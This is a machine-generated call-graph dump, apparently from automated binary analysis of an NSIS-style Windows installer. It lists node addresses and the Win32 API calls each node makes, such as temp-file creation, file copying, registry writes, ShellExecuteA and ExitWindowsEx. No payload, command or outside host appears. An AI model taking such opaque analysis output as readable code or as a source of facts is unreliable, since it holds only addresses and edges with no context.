3958->3959 3960 402268 3959->3960 3962 4054f3 MessageBoxIndirectA 3960->3962 3962->3961 3963 4014d6 3964 402a1d 18 API calls 3963->3964 3965 4014dc Sleep 3964->3965 3967 4028cf 3965->3967 3504 4030d9 SetErrorMode GetVersion 3505 403110 3504->3505 3506 403116 3504->3506 3507 406092 5 API calls 3505->3507 3508 406028 3 API calls 3506->3508 3507->3506 3509 40312c 3508->3509 3510 406028 3 API calls 3509->3510 3511 403136 3510->3511 3512 406028 3 API calls 3511->3512 3513 403140 3512->3513 3514 406092 5 API calls 3513->3514 3515 403147 3514->3515 3516 406092 5 API calls 3515->3516 3517 40314e #17 OleInitialize SHGetFileInfoA 3516->3517 3595 405cfd lstrcpynA 3517->3595 3519 40318b GetCommandLineA 3596 405cfd lstrcpynA 3519->3596 3521 40319d GetModuleHandleA 3522 4031b4 3521->3522 3523 40579a CharNextA 3522->3523 3524 4031c8 CharNextA 3523->3524 3533 4031d8 3524->3533 3525 4032a2 3526 4032b5 GetTempPathA 3525->3526 3597 4030a8 3526->3597 3528 4032cd 3530 4032d1 GetWindowsDirectoryA lstrcatA 3528->3530 3531 403327 DeleteFileA 3528->3531 3529 40579a CharNextA 3529->3533 3534 4030a8 12 API calls 3530->3534 3607 402c66 GetTickCount GetModuleFileNameA 3531->3607 3533->3525 3533->3529 3537 4032a4 3533->3537 3536 4032ed 3534->3536 3535 40333b 3540 4033c1 3535->3540 3544 40579a CharNextA 3535->3544 3590 4033d1 3535->3590 3536->3531 3539 4032f1 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3536->3539 3691 405cfd lstrcpynA 3537->3691 3542 4030a8 12 API calls 3539->3542 3635 40367d 3540->3635 3546 40331f 3542->3546 3547 403356 3544->3547 3546->3531 3546->3590 3554 403401 3547->3554 3555 40339c 3547->3555 3548 403509 3551 403511 GetCurrentProcess OpenProcessToken 3548->3551 3552 40358b ExitProcess 3548->3552 3549 4033eb 3550 4054f3 MessageBoxIndirectA 3549->3550 3556 4033f9 ExitProcess 3550->3556 3557 40355c 3551->3557 3558 40352c LookupPrivilegeValueA AdjustTokenPrivileges 3551->3558 3561 405476 5 API calls 3554->3561 3692 40585d 3555->3692 3559 406092 5 API calls 3557->3559 3558->3557 3562 403563 3559->3562 3564 403406 lstrcatA 3561->3564 3565 403578 ExitWindowsEx 3562->3565 3569 403584 3562->3569 3566 403422 lstrcatA lstrcmpiA 3564->3566 3567 403417 lstrcatA 3564->3567 3565->3552 3565->3569 3568 40343e 3566->3568 3566->3590 3567->3566 3572 403443 3568->3572 3573 40344a 3568->3573 3574 40140b 2 API calls 3569->3574 3571 4033b6 3707 405cfd lstrcpynA 3571->3707 3576 4053dc 4 API calls 3572->3576 3577 405459 2 API calls 3573->3577 3574->3552 3578 403448 3576->3578 3579 40344f SetCurrentDirectoryA 3577->3579 3578->3579 3580 403469 3579->3580 3581 40345e 3579->3581 3716 405cfd lstrcpynA 3580->3716 3715 405cfd lstrcpynA 3581->3715 3584 405d1f 18 API calls 3585 4034a8 DeleteFileA 3584->3585 3586 4034b5 CopyFileA 3585->3586 3592 403477 3585->3592 3586->3592 3587 4034fd 3589 405bb8 38 API calls 3587->3589 3588 405bb8 38 API calls 3588->3592 3589->3590 3708 4035a3 3590->3708 3591 405d1f 18 API calls 3591->3592 3592->3584 3592->3587 3592->3588 3592->3591 3593 40548e 2 API calls 3592->3593 3594 4034e9 CloseHandle 3592->3594 3593->3592 3594->3592 3595->3519 3596->3521 3598 405f68 5 API calls 3597->3598 3599 4030b4 3598->3599 3600 4030be 3599->3600 3601 40576f 3 API calls 3599->3601 3600->3528 3602 4030c6 3601->3602 3603 405459 2 API calls 3602->3603 3604 4030cc 3603->3604 3717 40599f 3604->3717 3721 405970 GetFileAttributesA CreateFileA 3607->3721 3609 402ca6 3627 402cb6 3609->3627 3722 405cfd lstrcpynA 3609->3722 3611 402ccc 3723 4057b6 lstrlenA 3611->3723 3615 402cdd GetFileSize 3616 402dd9 3615->3616 3629 402cf4 3615->3629 3728 402c02 3616->3728 3618 402de2 3620 402e12 GlobalAlloc 3618->3620 3618->3627 3740 403091 SetFilePointer 3618->3740 3619 40307b ReadFile 3619->3629 3739 403091 SetFilePointer 3620->3739 3622 402e45 3624 402c02 6 API calls 3622->3624 3624->3627 3625 402dfb 3628 40307b ReadFile 3625->3628 3626 402e2d 3630 402e9f 36 API calls 3626->3630 3627->3535 3631 402e06 3628->3631 3629->3616 3629->3619 3629->3622 3629->3627 3632 402c02 6 API calls 3629->3632 3633 402e39 3630->3633 3631->3620 3631->3627 3632->3629 3633->3627 3633->3633 3634 402e76 SetFilePointer 3633->3634 3634->3627 3636 406092 5 API calls 3635->3636 3637 403691 3636->3637 3638 403697 3637->3638 3639 4036a9 3637->3639 3750 405c5b wsprintfA 3638->3750 3640 405be4 3 API calls 3639->3640 3641 4036d4 3640->3641 3642 4036f2 lstrcatA 3641->3642 3644 405be4 3 API calls 3641->3644 3645 4036a7 3642->3645 3644->3642 3741 403942 3645->3741 3648 40585d 18 API calls 3649 403724 3648->3649 3650 4037ad 3649->3650 3652 405be4 3 API calls 3649->3652 3651 40585d 18 API calls 3650->3651 3653 4037b3 3651->3653 3655 403750 3652->3655 3654 4037c3 LoadImageA 3653->3654 3656 405d1f 18 API calls 3653->3656 3657 403869 3654->3657 3658 4037ea RegisterClassA 3654->3658 3655->3650 3659 40376c lstrlenA 3655->3659 3662 40579a CharNextA 3655->3662 3656->3654 3661 40140b 2 API calls 3657->3661 3660 403820 SystemParametersInfoA CreateWindowExA 3658->3660 3690 403873 3658->3690 3663 4037a0 3659->3663 3664 40377a lstrcmpiA 3659->3664 3660->3657 3665 40386f 3661->3665 3666 40376a 3662->3666 3668 40576f 3 API calls 3663->3668 3664->3663 3667 40378a GetFileAttributesA 3664->3667 3670 403942 19 API calls 3665->3670 3665->3690 3666->3659 3669 403796 3667->3669 3671 4037a6 3668->3671 3669->3663 3672 4057b6 2 API calls 3669->3672 3673 403880 3670->3673 3751 405cfd lstrcpynA 3671->3751 3672->3663 3675 40388c ShowWindow 3673->3675 3676 40390f 3673->3676 3678 406028 3 API calls 3675->3678 3677 404fe8 5 API calls 3676->3677 3679 403915 3677->3679 3680 4038a4 3678->3680 3681 403931 3679->3681 3682 403919 3679->3682 3683 4038b2 GetClassInfoA 3680->3683 3685 406028 3 API calls 3680->3685 3684 40140b 2 API calls 3681->3684 3689 40140b 2 API calls 3682->3689 3682->3690 3686 4038c6 GetClassInfoA RegisterClassA 3683->3686 3687 4038dc DialogBoxParamA 3683->3687 3684->3690 3685->3683 3686->3687 3688 40140b 2 API calls 3687->3688 3688->3690 3689->3690 3690->3590 3691->3526 3753 405cfd lstrcpynA 3692->3753 3694 40586e 3695 405808 4 API calls 3694->3695 3696 405874 3695->3696 3697 4033a7 3696->3697 3698 405f68 5 API calls 3696->3698 3697->3590 3706 405cfd lstrcpynA 3697->3706 3703 405884 3698->3703 3699 4058af lstrlenA 3700 4058ba 3699->3700 3699->3703 3702 40576f 3 API calls 3700->3702 3701 406001 2 API calls 3701->3703 3704 4058bf GetFileAttributesA 3702->3704 3703->3697 3703->3699 3703->3701 3705 4057b6 2 API calls 3703->3705 3704->3697 3705->3699 3706->3571 3707->3540 3709 4035bb 3708->3709 3710 4035ad CloseHandle 3708->3710 3754 4035e8 3709->3754 3710->3709 3715->3580 3716->3592 3718 4059aa GetTickCount GetTempFileNameA 3717->3718 3719 4030d7 3718->3719 3720 4059d7 3718->3720 3719->3528 3720->3718 3720->3719 3721->3609 3722->3611 3724 4057c3 3723->3724 3725 402cd2 3724->3725 3726 4057c8 CharPrevA 3724->3726 3727 405cfd lstrcpynA 3725->3727 3726->3724 3726->3725 3727->3615 3729 402c23 3728->3729 3730 402c0b 3728->3730 3731 402c33 GetTickCount 3729->3731 3732 402c2b 3729->3732 3733 402c14 DestroyWindow 3730->3733 3734 402c1b 3730->3734 3736 402c41 CreateDialogParamA ShowWindow 3731->3736 3737 402c64 3731->3737 3735 4060ce 2 API calls 3732->3735 3733->3734 3734->3618 3738 402c31 3735->3738 3736->3737 3737->3618 3738->3618 3739->3626 3740->3625 3742 403956 3741->3742 3752 405c5b wsprintfA 3742->3752 3744 4039c7 3745 405d1f 18 API calls 3744->3745 3746 4039d3 SetWindowTextA 3745->3746 3747 403702 3746->3747 3748 4039ef 3746->3748 3747->3648 3748->3747 3749 405d1f 18 API calls 3748->3749 3749->3748 3750->3645 3751->3650 3752->3744 3753->3694 3756 4035f6 3754->3756 3755 4035c0 3758 40559f 3755->3758 3756->3755 3757 4035fb FreeLibrary GlobalFree 3756->3757 3757->3755 3757->3757 3759 40585d 18 API calls 3758->3759 3760 4055bf 3759->3760 3761 4055c7 DeleteFileA 3760->3761 3762 4055de 3760->3762 3791 4033da OleUninitialize 3761->3791 3764 40570c 3762->3764 3795 405cfd lstrcpynA 3762->3795 3770 406001 2 API calls 3764->3770 3764->3791 3765 405604 3766 405617 3765->3766 3767 40560a lstrcatA 3765->3767 3769 4057b6 2 API calls 3766->3769 3768 40561d 3767->3768 3771 40562b lstrcatA 3768->3771 3773 405636 lstrlenA FindFirstFileA 3768->3773 3769->3768 3772 405730 3770->3772 3771->3773 3774 40576f 3 API calls 3772->3774 3772->3791 3773->3764 3781 40565a 3773->3781 3775 40573a 3774->3775 3777 405557 5 API calls 3775->3777 3776 40579a CharNextA 3776->3781 3778 405746 3777->3778 3779 405760 3778->3779 3780 40574a 3778->3780 3784 404f16 25 API calls 3779->3784 3786 404f16 25 API calls 3780->3786 3780->3791 3781->3776 3782 4056eb FindNextFileA 3781->3782 3790 40559f 62 API calls 3781->3790 3792 404f16 25 API calls 3781->3792 3793 404f16 25 API calls 3781->3793 3794 405bb8 38 API calls 3781->3794 3796 405cfd lstrcpynA 3781->3796 3797 405557 3781->3797 3782->3781 3785 405703 FindClose 3782->3785 3784->3791 3785->3764 3787 405757 3786->3787 3788 405bb8 38 API calls 3787->3788 3788->3791 3790->3781 3791->3548 3791->3549 3792->3782 3793->3781 3794->3781 3795->3765 3796->3781 3798 40594b 2 API calls 3797->3798 3799 405563 3798->3799 3800 405584 3799->3800 3801 405572 RemoveDirectoryA 3799->3801 3802 40557a DeleteFileA 3799->3802 3800->3781 3803 405580 3801->3803 3802->3803 3803->3800 3804 405590 SetFileAttributesA 3803->3804 3804->3800 3968 4042d9 3969 4042e9 3968->3969 3970 40430f 3968->3970 3972 403ee2 19 API calls 3969->3972 3971 403f49 8 API calls 3970->3971 3973 40431b 3971->3973 3974 4042f6 SetDlgItemTextA 3972->3974 3974->3970 3975 40155b 3976 402877 3975->3976 3979 405c5b wsprintfA 3976->3979 3978 40287c 3979->3978 3980 40255c 3981 402a1d 18 API calls 3980->3981 3986 402566 3981->3986 3982 4025d0 3983 4059e8 ReadFile 3983->3986 3984 4025d2 3989 405c5b wsprintfA 3984->3989 3985 4025e2 3985->3982 3988 4025f8 SetFilePointer 3985->3988 3986->3982 3986->3983 3986->3984 3986->3985 3988->3982 3989->3982 3805 40205e 3806 402a3a 18 API calls 3805->3806 3807 402065 3806->3807 3808 402a3a 18 API calls 3807->3808 3809 40206f 3808->3809 3810 402a3a 18 API calls 3809->3810 3811 402079 3810->3811 3812 402a3a 18 API calls 3811->3812 3813 402083 3812->3813 3814 402a3a 18 API calls 3813->3814 3815 40208d 3814->3815 3816 4020cc CoCreateInstance 3815->3816 3817 402a3a 18 API calls 3815->3817 3820 4020eb 3816->3820 3822 402193 3816->3822 3817->3816 3818 401423 25 API calls 3819 4021c9 3818->3819 3821 402173 MultiByteToWideChar 3820->3821 3820->3822 3821->3822 3822->3818 3822->3819 3990 40265e 3991 402664 3990->3991 3992 402668 FindNextFileA 3991->3992 3995 40267a 3991->3995 3993 4026b9 3992->3993 3992->3995 3996 405cfd lstrcpynA 3993->3996 3996->3995 3997 401cde GetDlgItem GetClientRect 3998 402a3a 18 API calls 3997->3998 3999 401d0e LoadImageA SendMessageA 3998->3999 4000 401d2c DeleteObject 3999->4000 4001 4028cf 3999->4001 4000->4001 2997 401662 3011 402a3a 2997->3011 3000 402a3a 18 API calls 3001 401672 3000->3001 3002 402a3a 18 API calls 3001->3002 3003 40167b MoveFileA 3002->3003 3004 401687 3003->3004 3005 40168e 3003->3005 3024 401423 3004->3024 3009 4021c9 3005->3009 3017 406001 FindFirstFileA 3005->3017 3012 402a46 3011->3012 3027 405d1f 3012->3027 3014 401669 3014->3000 3018 406017 FindClose 3017->3018 3019 40169d 3017->3019 3018->3019 3019->3009 3020 405bb8 MoveFileExA 3019->3020 3021 405bd9 3020->3021 3022 405bcc 3020->3022 3021->3004 3066 405a46 lstrcpyA 3022->3066 3104 404f16 3024->3104 3042 405d2c 3027->3042 3028 405f4f 3029 402a67 3028->3029 3061 405cfd lstrcpynA 3028->3061 3029->3014 3045 405f68 3029->3045 3031 405dcd GetVersion 3031->3042 3032 405f26 lstrlenA 3032->3042 3034 405d1f 10 API calls 3034->3032 3037 405e45 GetSystemDirectoryA 3037->3042 3038 405e58 GetWindowsDirectoryA 3038->3042 3039 405f68 5 API calls 3039->3042 3040 405d1f 10 API calls 3040->3042 3041 405ecf lstrcatA 3041->3042 3042->3028 3042->3031 3042->3032 3042->3034 3042->3037 3042->3038 3042->3039 3042->3040 3042->3041 3043 405e8c SHGetSpecialFolderLocation 3042->3043 3054 405be4 RegOpenKeyExA 3042->3054 3059 405c5b wsprintfA 3042->3059 3060 405cfd lstrcpynA 3042->3060 3043->3042 3044 405ea4 SHGetPathFromIDListA CoTaskMemFree 3043->3044 3044->3042 3051 405f74 3045->3051 3046 405fe0 CharPrevA 3047 405fdc 3046->3047 3047->3046 3049 405ffb 3047->3049 3048 405fd1 CharNextA 3048->3047 3048->3051 3049->3014 3051->3047 3051->3048 3052 405fbf CharNextA 3051->3052 3053 405fcc CharNextA 3051->3053 3062 40579a 3051->3062 3052->3051 3053->3048 3055 405c55 3054->3055 3056 405c17 RegQueryValueExA 3054->3056 3055->3042 3057 405c38 RegCloseKey 3056->3057 3057->3055 3059->3042 3060->3042 3061->3029 3063 4057a0 3062->3063 3064 4057b3 3063->3064 3065 4057a6 CharNextA 3063->3065 3064->3051 3065->3063 3067 405a94 GetShortPathNameA 3066->3067 3068 405a6e 3066->3068 3070 405bb3 3067->3070 3071 405aa9 3067->3071 3093 405970 GetFileAttributesA CreateFileA 3068->3093 3070->3021 3071->3070 3073 405ab1 wsprintfA 3071->3073 3072 405a78 CloseHandle GetShortPathNameA 3072->3070 3074 405a8c 3072->3074 3075 405d1f 18 API calls 3073->3075 3074->3067 3074->3070 3076 405ad9 3075->3076 3094 405970 GetFileAttributesA CreateFileA 3076->3094 3078 405ae6 3078->3070 3079 405af5 GetFileSize GlobalAlloc 3078->3079 3080 405b17 3079->3080 3081 405bac CloseHandle 3079->3081 3095 4059e8 ReadFile 3080->3095 3081->3070 3086 405b36 lstrcpyA 3089 405b58 3086->3089 3087 405b4a 3088 4058d5 4 API calls 3087->3088 3088->3089 3090 405b8f SetFilePointer 3089->3090 3102 405a17 WriteFile 3090->3102 3093->3072 3094->3078 3096 405a06 3095->3096 3096->3081 3097 4058d5 lstrlenA 3096->3097 3098 405916 lstrlenA 3097->3098 3099 40591e 3098->3099 3100 4058ef lstrcmpiA 3098->3100 3099->3086 3099->3087 3100->3099 3101 40590d CharNextA 3100->3101 3101->3098 3103 405a35 GlobalFree 3102->3103 3103->3081 3105 404f31 3104->3105 3114 401431 3104->3114 3106 404f4e lstrlenA 3105->3106 3107 405d1f 18 API calls 3105->3107 3108 404f77 3106->3108 3109 404f5c lstrlenA 3106->3109 3107->3106 3111 404f8a 3108->3111 3112 404f7d SetWindowTextA 3108->3112 3110 404f6e lstrcatA 3109->3110 3109->3114 3110->3108 3113 404f90 SendMessageA SendMessageA SendMessageA 3111->3113 3111->3114 3112->3111 3113->3114 3114->3009 3149 402364 3150 40236a 3149->3150 3151 402a3a 18 API calls 3150->3151 3152 40237c 3151->3152 3153 402a3a 18 API calls 3152->3153 3154 402386 RegCreateKeyExA 3153->3154 3155 4023b0 3154->3155 3156 4028cf 3154->3156 3157 4023c8 3155->3157 3158 402a3a 18 API calls 3155->3158 3159 4023d4 3157->3159 3187 402a1d 3157->3187 3161 4023c1 lstrlenA 3158->3161 3160 4023ef RegSetValueExA 3159->3160 3166 402e9f 3159->3166 3164 402405 RegCloseKey 3160->3164 3161->3157 3164->3156 3168 402eb5 3166->3168 3167 402ee0 3190 40307b 3167->3190 3168->3167 3200 403091 SetFilePointer 3168->3200 3172 40301b 3174 40301f 3172->3174 3179 403037 3172->3179 3173 402efd GetTickCount 3185 402f10 3173->3185 3176 40307b ReadFile 3174->3176 3175 403005 3175->3160 3176->3175 3177 40307b ReadFile 3177->3179 3178 40307b ReadFile 3178->3185 3179->3175 3179->3177 3180 405a17 WriteFile 3179->3180 3180->3179 3182 402f76 GetTickCount 3182->3185 3183 402f9f MulDiv wsprintfA 3184 404f16 25 API calls 3183->3184 3184->3185 3185->3175 3185->3178 3185->3182 3185->3183 3186 405a17 WriteFile 3185->3186 3193 406195 3185->3193 3186->3185 3188 405d1f 18 API calls 3187->3188 3189 402a31 3188->3189 3189->3159 3191 4059e8 ReadFile 3190->3191 3192 402eeb 3191->3192 3192->3172 3192->3173 3192->3175 3194 4061ba 3193->3194 3195 4061c2 3193->3195 3194->3185 3195->3194 3196 406252 GlobalAlloc 3195->3196 3197 406249 GlobalFree 3195->3197 3198 4062c0 GlobalFree 3195->3198 3199 4062c9 GlobalAlloc 3195->3199 3196->3194 3196->3195 3197->3196 3198->3199 3199->3194 3199->3195 3200->3167 3201 401567 3202 401577 ShowWindow 3201->3202 3203 40157e 3201->3203 3202->3203 3204 40158c ShowWindow 3203->3204 3205 4028cf 3203->3205 3204->3205 3216 401dea 3217 402a3a 18 API calls 3216->3217 3218 401df0 3217->3218 3219 402a3a 18 API calls 3218->3219 3220 401df9 3219->3220 3221 402a3a 18 API calls 3220->3221 3222 401e02 3221->3222 3223 402a3a 18 API calls 3222->3223 3224 401e0b 3223->3224 3225 401423 25 API calls 3224->3225 3226 401e12 ShellExecuteA 3225->3226 3227 401e3f 3226->3227 4009 401eee 4010 402a3a 18 API calls 4009->4010 4011 401ef5 4010->4011 4012 406092 5 API calls 4011->4012 4013 401f04 4012->4013 4014 401f1c GlobalAlloc 4013->4014 4015 401f84 4013->4015 4014->4015 4016 401f30 4014->4016 4017 406092 5 API calls 4016->4017 4018 401f37 4017->4018 4019 406092 5 API calls 4018->4019 4020 401f41 4019->4020 4020->4015 4024 405c5b wsprintfA 4020->4024 4022 401f78 4025 405c5b wsprintfA 4022->4025 4024->4022 4025->4015 4026 4014f0 SetForegroundWindow 4027 4028cf 4026->4027 4028 404671 4029 404681 4028->4029 4030 40469d 4028->4030 4039 4054d7 GetDlgItemTextA 4029->4039 4032 4046d0 4030->4032 4033 4046a3 SHGetPathFromIDListA 4030->4033 4035 4046ba SendMessageA 4033->4035 4036 4046b3 4033->4036 4034 40468e SendMessageA 4034->4030 4035->4032 4037 40140b 2 API calls 4036->4037 4037->4035 4039->4034 4045 4018f5 4046 40192c 4045->4046 4047 402a3a 18 API calls 4046->4047 4048 401931 4047->4048 4049 40559f 69 API calls 4048->4049 4050 40193a 4049->4050 4051 403ff6 lstrcpynA lstrlenA 4052 4024f7 4053 402a3a 18 API calls 4052->4053 4054 4024fe 4053->4054 4057 405970 GetFileAttributesA CreateFileA 4054->4057 4056 40250a 4057->4056 4058 4018f8 4059 402a3a 18 API calls 4058->4059 4060 4018ff 4059->4060 4061 4054f3 MessageBoxIndirectA 4060->4061 4062 401908 4061->4062 4077 4014fe 4078 401506 4077->4078 4080 401519 4077->4080 4079 402a1d 18 API calls 4078->4079 4079->4080 4081 402b7f 4082 402b8e SetTimer 4081->4082 4085 402ba7 4081->4085 4082->4085 4083 402bfc 4084 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4084->4083 4085->4083 4085->4084 4086 401000 4087 401037 BeginPaint GetClientRect 4086->4087 4088 40100c DefWindowProcA 4086->4088 4090 4010f3 4087->4090 4091 401179 4088->4091 4092 401073 CreateBrushIndirect FillRect DeleteObject 4090->4092 4093 4010fc 4090->4093 4092->4090 4094 401102 CreateFontIndirectA 4093->4094 4095 401167 EndPaint 4093->4095 4094->4095 4096 401112 6 API calls 4094->4096 4095->4091 4096->4095 4104 401b02 4105 402a3a 18 API calls 4104->4105 4106 401b09 4105->4106 4107 402a1d 18 API calls 4106->4107 4108 401b12 wsprintfA 4107->4108 4109 4028cf 4108->4109 4110 402482 4111 402b44 19 API calls 4110->4111 4112 40248c 4111->4112 4113 402a1d 18 API calls 4112->4113 4114 402495 4113->4114 4115 4024b8 RegEnumValueA 4114->4115 4116 4024ac RegEnumKeyA 4114->4116 4117 4026a6 4114->4117 4115->4117 4118 4024d1 RegCloseKey 4115->4118 4116->4118 4118->4117 3115 402283 3116 402291 3115->3116 3117 40228b 3115->3117 3119 402a3a 18 API calls 3116->3119 3121 4022a1 3116->3121 3118 402a3a 18 API calls 3117->3118 3118->3116 3119->3121 3120 402a3a 18 API calls 3124 4022b8 WritePrivateProfileStringA 3120->3124 3122 402a3a 18 API calls 3121->3122 3123 4022af 3121->3123 3122->3123 3123->3120 4120 401a03 4121 402a3a 18 API calls 4120->4121 4122 401a0c ExpandEnvironmentStringsA 4121->4122 4123 401a20 4122->4123 4125 401a33 4122->4125 4124 401a25 lstrcmpA 4123->4124 4123->4125 4124->4125 3206 402688 3207 402a3a 18 API calls 3206->3207 3208 40268f FindFirstFileA 3207->3208 3209 4026b2 3208->3209 3210 4026a2 3208->3210 3211 4026b9 3209->3211 3214 405c5b wsprintfA 3209->3214 3215 405cfd lstrcpynA 3211->3215 3214->3211 3215->3210 4126 402308 4127 402338 4126->4127 4128 40230d 4126->4128 4129 402a3a 18 API calls 4127->4129 4130 402b44 19 API calls 4128->4130 4131 40233f 4129->4131 4132 402314 4130->4132 4137 402a7a RegOpenKeyExA 4131->4137 4133 402a3a 18 API calls 4132->4133 4136 402355 4132->4136 4134 402325 RegDeleteValueA RegCloseKey 4133->4134 4134->4136 4144 402af1 4137->4144 4145 402aa5 4137->4145 4138 402acb RegEnumKeyA 4139 402add RegCloseKey 4138->4139 4138->4145 4141 406092 5 API calls 4139->4141 4140 402b02 RegCloseKey 4140->4144 4143 402aed 4141->4143 4142 402a7a 5 API calls 4142->4145 4143->4144 4146 402b1d RegDeleteKeyA 4143->4146 4144->4136 4145->4138 4145->4139 4145->4140 4145->4142 4146->4144 4147 404e8a 4148 404e9a 4147->4148 4149 404eae 4147->4149 4151 404ea0 4148->4151 4152 404ef7 4148->4152 4150 404eb6 IsWindowVisible 4149->4150 4158 404ecd 4149->4158 4150->4152 4153 404ec3 4150->4153 4155 403f2e SendMessageA 4151->4155 4154 404efc CallWindowProcA 4152->4154 4160 4047e1 SendMessageA 4153->4160 4156 404eaa 4154->4156 4155->4156 4158->4154 4165 404861 4158->4165 4161 404840 SendMessageA 4160->4161 4162 404804 GetMessagePos ScreenToClient SendMessageA 4160->4162 4163 404838 4161->4163 4162->4163 4164 40483d 4162->4164 4163->4158 4164->4161 4174 405cfd lstrcpynA 4165->4174 4167 404874 4175 405c5b wsprintfA 4167->4175 4169 40487e 4170 40140b 2 API calls 4169->4170 4171 404887 4170->4171 4176 405cfd lstrcpynA 4171->4176 4173 40488e 4173->4152 4174->4167 4175->4169 4176->4173 4177 401c8a 4178 402a1d 18 API calls 4177->4178 4179 401c90 IsWindow 4178->4179 4180 4019f3 4179->4180 3228 403a0f 3229 403b62 3228->3229 3230 403a27 3228->3230 3232 403bb3 3229->3232 3233 403b73 GetDlgItem GetDlgItem 3229->3233 3230->3229 3231 403a33 3230->3231 3234 403a51 3231->3234 3235 403a3e SetWindowPos 3231->3235 3237 403c0d 3232->3237 3245 401389 2 API calls 3232->3245 3236 403ee2 19 API calls 3233->3236 3239 403a56 ShowWindow 3234->3239 3240 403a6e 3234->3240 3235->3234 3241 403b9d SetClassLongA 3236->3241 3246 403b5d 3237->3246 3298 403f2e 3237->3298 3239->3240 3242 403a90 3240->3242 3243 403a76 DestroyWindow 3240->3243 3244 40140b 2 API calls 3241->3244 3248 403a95 SetWindowLongA 3242->3248 3249 403aa6 3242->3249 3247 403e6b 3243->3247 3244->3232 3250 403be5 3245->3250 3247->3246 3257 403e9c ShowWindow 3247->3257 3248->3246 3253 403ab2 GetDlgItem 3249->3253 3254 403b4f 3249->3254 3250->3237 3255 403be9 SendMessageA 3250->3255 3251 40140b 2 API calls 3269 403c1f 3251->3269 3252 403e6d DestroyWindow EndDialog 3252->3247 3258 403ae2 3253->3258 3259 403ac5 SendMessageA IsWindowEnabled 3253->3259 3317 403f49 3254->3317 3255->3246 3257->3246 3261 403aef 3258->3261 3262 403b36 SendMessageA 3258->3262 3263 403b02 3258->3263 3272 403ae7 3258->3272 3259->3246 3259->3258 3260 405d1f 18 API calls 3260->3269 3261->3262 3261->3272 3262->3254 3266 403b0a 3263->3266 3267 403b1f 3263->3267 3265 403ee2 19 API calls 3265->3269 3311 40140b 3266->3311 3271 40140b 2 API calls 3267->3271 3268 403b1d 3268->3254 3269->3246 3269->3251 3269->3252 3269->3260 3269->3265 3289 403dad DestroyWindow 3269->3289 3301 403ee2 3269->3301 3273 403b26 3271->3273 3314 403ebb 3272->3314 3273->3254 3273->3272 3275 403c9a GetDlgItem 3276 403cb7 ShowWindow KiUserCallbackDispatcher 3275->3276 3277 403caf 3275->3277 3304 403f04 KiUserCallbackDispatcher 3276->3304 3277->3276 3279 403ce1 EnableWindow 3282 403cf5 3279->3282 3280 403cfa GetSystemMenu EnableMenuItem SendMessageA 3281 403d2a SendMessageA 3280->3281 3280->3282 3281->3282 3282->3280 3305 403f17 SendMessageA 3282->3305 3306 405cfd lstrcpynA 3282->3306 3285 403d58 lstrlenA 3286 405d1f 18 API calls 3285->3286 3287 403d69 SetWindowTextA 3286->3287 3307 401389 3287->3307 3289->3247 3290 403dc7 CreateDialogParamA 3289->3290 3290->3247 3291 403dfa 3290->3291 3292 403ee2 19 API calls 3291->3292 3293 403e05 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3292->3293 3294 401389 2 API calls 3293->3294 3295 403e4b 3294->3295 3295->3246 3296 403e53 ShowWindow 3295->3296 3297 403f2e SendMessageA 3296->3297 3297->3247 3299 403f46 3298->3299 3300 403f37 SendMessageA 3298->3300 3299->3269 3300->3299 3302 405d1f 18 API calls 3301->3302 3303 403eed SetDlgItemTextA 3302->3303 3303->3275 3304->3279 3305->3282 3306->3285 3309 401390 3307->3309 3308 4013fe 3308->3269 3309->3308 3310 4013cb MulDiv SendMessageA 3309->3310 3310->3309 3312 401389 2 API calls 3311->3312 3313 401420 3312->3313 3313->3272 3315 403ec2 3314->3315 3316 403ec8 SendMessageA 3314->3316 3315->3316 3316->3268 3318 403f61 GetWindowLongA 3317->3318 3328 403fea 3317->3328 3319 403f72 3318->3319 3318->3328 3320 403f81 GetSysColor 3319->3320 3321 403f84 3319->3321 3320->3321 3322 403f94 SetBkMode 3321->3322 3323 403f8a SetTextColor 3321->3323 3324 403fb2 3322->3324 3325 403fac GetSysColor 3322->3325 3323->3322 3326 403fc3 3324->3326 3327 403fb9 SetBkColor 3324->3327 3325->3324 3326->3328 3329 403fd6 DeleteObject 3326->3329 3330 403fdd CreateBrushIndirect 3326->3330 3327->3326 3328->3246 3329->3330 3330->3328 3331 402410 3342 402b44 3331->3342 3333 40241a 3334 402a3a 18 API calls 3333->3334 3335 402423 3334->3335 3336 40242d RegQueryValueExA 3335->3336 3341 4026a6 3335->3341 3337 402453 RegCloseKey 3336->3337 3338 40244d 3336->3338 3337->3341 3338->3337 3346 405c5b wsprintfA 3338->3346 3343 402a3a 18 API calls 3342->3343 3344 402b5d 3343->3344 3345 402b6b RegOpenKeyExA 3344->3345 3345->3333 3346->3337 4181 401490 4182 404f16 25 API calls 4181->4182 4183 401497 4182->4183 4184 401f90 4185 401fa2 4184->4185 4186 402050 4184->4186 4187 402a3a 18 API calls 4185->4187 4189 401423 25 API calls 4186->4189 4188 401fa9 4187->4188 4190 402a3a 18 API calls 4188->4190 4195 4021c9 4189->4195 4191 401fb2 4190->4191 4192 401fc7 LoadLibraryExA 4191->4192 4193 401fba GetModuleHandleA 4191->4193 4192->4186 4194 401fd7 GetProcAddress 4192->4194 4193->4192 4193->4194 4196 402023 4194->4196 4197 401fe6 4194->4197 4198 404f16 25 API calls 4196->4198 4199 401423 25 API calls 4197->4199 4200 401ff6 4197->4200 4198->4200 4199->4200 4200->4195 4201 402044 FreeLibrary 4200->4201 4201->4195 4209 404893 GetDlgItem GetDlgItem 4210 4048e5 7 API calls 4209->4210 4217 404afd 4209->4217 4211 404988 DeleteObject 4210->4211 4212 40497b SendMessageA 4210->4212 4213 404991 4211->4213 4212->4211 4214 4049c8 4213->4214 4216 405d1f 18 API calls 4213->4216 4218 403ee2 19 API calls 4214->4218 4215 404be1 4219 404c8d 4215->4219 4230 404c3a SendMessageA 4215->4230 4249 404af0 4215->4249 4221 4049aa SendMessageA SendMessageA 4216->4221 4217->4215 4220 404b6e 4217->4220 4228 4047e1 5 API calls 4217->4228 4224 4049dc 4218->4224 4222 404c97 SendMessageA 4219->4222 4223 404c9f 4219->4223 4220->4215 4226 404bd3 SendMessageA 4220->4226 4221->4213 4222->4223 4227 404cc8 4223->4227 4232 404cb1 ImageList_Destroy 4223->4232 4233 404cb8 4223->4233 4229 403ee2 19 API calls 4224->4229 4225 403f49 8 API calls 4231 404e83 4225->4231 4226->4215 4235 404e37 4227->4235 4252 404861 4 API calls 4227->4252 4256 404d03 